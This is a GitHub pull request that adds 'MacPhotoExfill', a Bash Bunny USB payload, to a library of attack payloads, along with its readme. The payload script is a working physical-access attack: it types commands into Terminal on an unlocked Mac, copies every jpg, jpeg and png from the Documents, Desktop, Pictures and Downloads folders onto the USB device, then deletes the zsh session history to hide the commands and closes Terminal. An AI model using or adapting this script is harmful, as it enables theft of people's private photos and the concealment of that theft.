Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exfilter all the images from the principal folders on unlocked MacOS … #586

Merged
merged 1 commit into from
Jun 6, 2023
Merged

Exfilter all the images from the principal folders on unlocked MacOS … #586

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
69 changes: 69 additions & 0 deletions payloads/library/exfiltration/MacPhotoExfill/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
#!/bin/bash
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacPhotoExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished

LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000

lootdir=loot/MacPhotoExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000

LED ATTACK

QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
# Cleanup and delete proofs
LED M SLOW
QUACK ENTER
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync

LED FINISH
50 changes: 50 additions & 0 deletions payloads/library/exfiltration/MacPhotoExfill/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
# Mac Photo Exfilter for the BashBunny


* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/


* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration

# DESCRIPTION

Exfilter all the images from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:

| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the images in /root/Documents folder |
| Desktop | All the images in /root/Desktop folder |
| Pictures | All the images in /root/Pictures folder |
| Downloads | All the images in /root/Downloads folder |

# IMAGE FORMATS

| Format |
| ------------------ |
| .jpg |
| .jpeg |
| .png |

# LED STATUS

| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |